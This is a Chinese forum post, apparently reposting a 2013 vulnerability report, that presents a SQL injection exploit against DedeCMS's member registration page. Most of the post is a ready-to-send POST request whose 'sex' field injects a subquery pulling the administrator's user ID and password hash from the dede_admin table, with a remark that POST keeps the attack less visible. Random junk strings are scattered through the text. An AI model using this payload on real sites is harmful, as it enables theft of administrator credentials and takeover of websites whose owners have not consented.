找回密码
 立即注册
查看: 2892|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
1 {% E- F2 y4 H0 y简要描述:
, q$ \/ I) G3 U) v5 t4 e& Q
. H) {$ w+ p$ w% X4 E需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
/ _& W, V' {$ L4 ]4 y) d原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.0 j" D/ f5 Y3 E1 e: E) R3 k% F
详细说明:跟这个漏洞
9 f0 v4 d  t$ X' r$ g1 k% I
7 J9 i4 x4 n  s6 e0 v: {: d5 FWooYun: Dedecms SQL注射导致审核机制绕过漏洞7 {5 E/ n# ]  D
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
3 b( l( G8 m! L  @$ P+ YPOST提交以下数据,其实不用POST提交的,这样隐蔽点.3 A. m. N, `2 H3 O

; l( O( Y' ]2 b  c6 z% `9 ~www.political-security.com/member/reg_new.php
- T/ s4 x, q1 ~# P # \1 X) u$ g% E7 }% q
POST5 a# W- p  V- I& d

; A: a; z- h, H# R  _$ I( vdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
  e: L4 F0 {7 Y6 Kuserid=c4rp3nt3r&uname=c4rp3nt3r
0 D% w5 m- q! {+ p3 q7 a2 n2 S# O&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss& }# L% a% }6 E* Y7 x9 ]4 W
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,9 f% P7 y9 ~" ^7 S- w5 a9 i" r
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
' J1 x$ M6 V+ x- W%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表